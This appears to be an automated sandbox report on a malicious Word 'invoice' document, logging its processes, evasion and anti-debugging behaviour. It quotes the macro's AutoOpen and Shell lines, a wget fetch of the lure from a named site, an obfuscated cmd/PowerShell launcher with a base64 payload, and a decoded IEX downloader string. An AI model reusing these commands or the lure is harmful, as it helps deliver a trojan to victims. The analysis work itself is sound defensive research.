Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft

System Summary:

Tries to open an application configuration file (.cfg)
Source: C:\Windows\System32\helphome.exe | File opened: C:\Windows\system32\helphome.cfg
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE
Binary contains paths to development resources
Source: WINWORD.EXE | Binary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K
Source: WINWORD.EXE | Binary or memory string: 3.vbP.v
Classification label
Source: classification engine | Classification label: mal100.evad.spre.phis.spyw.troj.win@28/12@66/47
Creates files inside the user directory
Source: C:\Windows\System32\wget.exe | File created: C:\Users\user\Desktop\download\Client- 9650, Oct 2017 Invoice.doc
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user~1\AppData\Local\Temp\CVRDEB.tmp
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Queries a list of all open handles
Source: C:\Windows\System32\helphome.exe | System information queried: HandleInformation
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\System32\wget.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown | Process created: C:\Windows\System32\wget.exe wget -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'austinfilmschool.org/Invoice-Dated-17-Oct-17-372510608/VR-AOFGB/2017/'
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\download\Client- 9650, Oct 2017 Invoice.doc
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /V /C 'set %GhHTTCPpd%=p^owe^rs&&set %VzCLIMdnL%=he^ll&&!%GhHTTCPpd%!!%VzCLIMdnL%! -e IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA
Source: unknown | Process created: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e 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
Source: unknown | Process created: C:\Users\user~1\AppData\Local\Temp\16994.exe 'C:\Users\user~1\AppData\Local\Temp\16994.exe'
Source: unknown | Process created: C:\Users\user~1\AppData\Local\Temp\16994.exe C:\Users\user~1\AppData\Local\Temp\16994.exe
Source: unknown | Process created: C:\Windows\System32\helphome.exe C:\Windows\system32\helphome.exe
Source: unknown | Process created: C:\Windows\System32\helphome.exe C:\Windows\system32\helphome.exe
Source: unknown | Process created: C:\Windows\System32\LLocMy8gfC0E0xG3.exe C:\Windows\system32\LLocMy8gfC0E0xG3.exe
Source: unknown | Process created: C:\Windows\System32\LLocMy8gfC0E0xG3.exe C:\Windows\system32\LLocMy8gfC0E0xG3.exe
Source: unknown | Process created: C:\Windows\System32\helphome.exe C:\Windows\system32\helphome.exe
Source: unknown | Process created: C:\Windows\System32\helphome.exe C:\Windows\system32\helphome.exe
Source: unknown | Process created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' 'C:\ProgramData\C5E3.tmp'
Source: unknown | Process created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E2.tmp'
Source: unknown | Process created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E1.tmp'
Source: unknown | Process created: C:\Windows\System32\wbem\WmiApSrv.exe C:\Windows\system32\wbem\WmiApSrv.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe cmd /V /C 'set %GhHTTCPpd%=p^owe^rs&&set %VzCLIMdnL%=he^ll&&!%GhHTTCPpd%!!%VzCLIMdnL%! -e IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user~1\AppData\Local\Temp\16994.exe 'C:\Users\user~1\AppData\Local\Temp\16994.exe'
Source: C:\Users\user~1\AppData\Local\Temp\16994.exe | Process created: C:\Users\user~1\AppData\Local\Temp\16994.exe C:\Users\user~1\AppData\Local\Temp\16994.exe
Source: C:\Windows\System32\helphome.exe | Process created: C:\Windows\System32\helphome.exe C:\Windows\system32\helphome.exe
Source: C:\Windows\System32\helphome.exe | Process created: C:\Windows\System32\LLocMy8gfC0E0xG3.exe C:\Windows\system32\LLocMy8gfC0E0xG3.exe
Source: C:\Windows\System32\LLocMy8gfC0E0xG3.exe | Process created: C:\Windows\System32\LLocMy8gfC0E0xG3.exe C:\Windows\system32\LLocMy8gfC0E0xG3.exe
Source: C:\Windows\System32\helphome.exe | Process created: C:\Windows\System32\helphome.exe C:\Windows\system32\helphome.exe
Source: C:\Windows\System32\helphome.exe | Process created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' 'C:\ProgramData\C5E3.tmp'
Source: C:\Windows\System32\helphome.exe | Process created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E2.tmp'
Source: C:\Windows\System32\helphome.exe | Process created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E1.tmp'
Uses an in-process (OLE) Automation server
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Creates files inside the system directory
Source: C:\Windows\System32\helphome.exe | File created: C:\Windows\system32\LLocMy8gfC0E0xG3.exe
Creates mutexes
Source: C:\Windows\System32\helphome.exe | Mutant created: \BaseNamedObjects\MB714DB14
Source: C:\Users\user~1\AppData\Local\Temp\16994.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\I5FDD0DB5
Source: C:\Users\user~1\AppData\Local\Temp\16994.exe | Mutant created: \Sessions\1\BaseNamedObjects\M366742AD
Source: C:\Windows\System32\helphome.exe | Mutant created: \BaseNamedObjects\Global\I5FDD0DB5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Windows\System32\LLocMy8gfC0E0xG3.exe | Mutant created: \BaseNamedObjects\M784CCE09
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user~1\AppData\Local\Temp\16994.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\M5FDD0DB5
Reads the hosts file
Source: C:\Windows\System32\wget.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\helphome.exe | File read: C:\Windows\System32\drivers\etc\hosts
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Client- 9650, Oct 2017 Invoice.doc.0.dr | OLE, VBA macro line: Sub AutoOpen()
Document contains an embedded VBA macro which may execute processes
Source: Client- 9650, Oct 2017 Invoice.doc.0.dr | OLE, VBA macro line: Shell$ "cmd /V /C " + Chr(34) + AhauqDMCW + OuOjFiFSOi + isaoqEowD + sKQKcZluLAi + bEpjbthcIB + IJWkoH + kXazjCnaicA + hONMw + OAVSw + HhLKRh + ORArVOiMokQ + GJPbsZ + rHCJYKza + GYuczAQ + sNzTCSAn + BuZYwvVTDE + FNnTtLA + ikoAVkzdnu + khucWwV + fPzjvS + FbLAAAVBYc + AumiwEiq + qQLASCdKY + XNbqBEEwC + MjkGkLpvv + JzDjW + UpWGblMKvm + aPzjIG + CiGJzHciMsD + MHjlkiA + SKoFt + QlloEEB + UwjzTvbdDE + RFWVKwprTad + NRprJawSGUm + AaUEZrR + WSwWK + tzKFG + OZsad + HQwEUW + sWVdAiYl + bpTbIQkqRA + QAWZlHZfv + rDLYQQ + cPfwRSK + RYpsoQmwkZ + uqFPj + YjkAmtoaUG, 0
Very long command line found
Source: unknown | Process created: Commandline size = 6274
Source: unknown | Process created: Commandline size = 6199
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: Commandline size = 6274
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 6199

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
Source: WINWORD.EXE | Binary or memory string: Progman
Source: WINWORD.EXE | Binary or memory string: Program Manager
Source: WINWORD.EXE | Binary or memory string: Shell_TrayWnd
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user~1\AppData\Local\Temp\16994.exe 'C:\Users\user~1\AppData\Local\Temp\16994.exe'
Source: C:\Users\user~1\AppData\Local\Temp\16994.exe | Process created: C:\Users\user~1\AppData\Local\Temp\16994.exe C:\Users\user~1\AppData\Local\Temp\16994.exe
Source: C:\Windows\System32\helphome.exe | Process created: C:\Windows\System32\helphome.exe C:\Windows\system32\helphome.exe
Source: C:\Windows\System32\helphome.exe | Process created: C:\Windows\System32\LLocMy8gfC0E0xG3.exe C:\Windows\system32\LLocMy8gfC0E0xG3.exe
Source: C:\Windows\System32\LLocMy8gfC0E0xG3.exe | Process created: C:\Windows\System32\LLocMy8gfC0E0xG3.exe C:\Windows\system32\LLocMy8gfC0E0xG3.exe
Source: C:\Windows\System32\helphome.exe | Process created: C:\Windows\System32\helphome.exe C:\Windows\system32\helphome.exe
Source: C:\Windows\System32\helphome.exe | Process created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' 'C:\ProgramData\C5E3.tmp'
Source: C:\Windows\System32\helphome.exe | Process created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E2.tmp'
Source: C:\Windows\System32\helphome.exe | Process created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E1.tmp'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\System32\wget.exe wget -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'austinfilmschool.org/Invoice-Dated-17-Oct-17-372510608/VR-AOFGB/2017/'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /V /C 'set %GhHTTCPpd%=p^owe^rs&&set %VzCLIMdnL%=he^ll&&!%GhHTTCPpd%!!%VzCLIMdnL%! -e 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
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e 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
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe cmd /V /C 'set %GhHTTCPpd%=p^owe^rs&&set %VzCLIMdnL%=he^ll&&!%GhHTTCPpd%!!%VzCLIMdnL%! -e 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
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e 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
Encrypted powershell cmdline option found
Source: unknownProcess created: Base64 decoded IEX (((36, 119 ,115, 99 , 114, 105, 112 ,116,32, 61 , 32, 110 , 101, 119 ,45 , 111, 98,106,101,99, 116 , 32,45,67,111, 109 ,79 ,98 , 106, 101 , 99, 116,32 , 87,83, 99,114 , 105, 112 , 116 ,46, 83,104,101 ,108, 108,59 , 36, 119 ,101, 98 ,99 ,108,105, 101 ,110,116, 32, 61 , 32, 110, 101, 119, 45 , 111 ,98 ,106 , 101 ,99 ,116,32 ,83 ,121,115 , 116, 101, 109, 46,78,101, 116 , 46 ,87,101 , 98, 67 ,108,105 ,101, 110 ,116, 59 , 36 , 114 ,97, 110,100,111,109 , 32 , 61,32 ,110, 101,119, 45, 111, 98, 106, 101
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded IEX (((36, 119 ,115, 99 , 114, 105, 112 ,116,32, 61 , 32, 110 , 101, 119 ,45 , 111, 98,106,101,99, 116 , 32,45,67,111, 109 ,79 ,98 , 106, 101 , 99, 116,32 , 87,83, 99,114 , 105, 112 , 116 ,46, 83,104,101 ,108, 108,59 , 36, 119 ,101, 98 ,99 ,108,105, 101 ,110,116, 32, 61 , 32, 110, 101, 119, 45 , 111 ,98 ,106 , 101 ,99 ,116,32 ,83 ,121,115 , 116, 101, 109, 46,78,101, 116 , 46 ,87,101 , 98, 67 ,108,105 ,101, 110 ,116, 59 , 36 , 114 ,97, 110,100,111,109 , 32 , 61,32 ,110, 101,119, 45, 111, 98, 106, 101
Injects files into Windows application
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Injected file: C:\Users\user\Desktop\download\Client- 9650, Oct 2017 Invoice.doc was created by C:\Windows\System32\wget.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\helphome.exe | Thread register set: target process: 3996

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory allocated: page read and write and page guard
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | System information queried: KernelDebuggerInformation
Checks if the current process is being debugged
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Process queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

Malware Analysis System Evasion:

Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Checks the free space of hard drives
Source: C:\Users\user~1\AppData\Local\Temp\16994.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\LLocMy8gfC0E0xG3.exe | File Volume queried: C:\ FullSizeInformation
Contains long sleeps (>= 3 min)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Thread delayed: delay time: 200
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3492 | Thread sleep time: -60s >= -60s (3 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576 | Thread sleep time: -120000s >= -60s
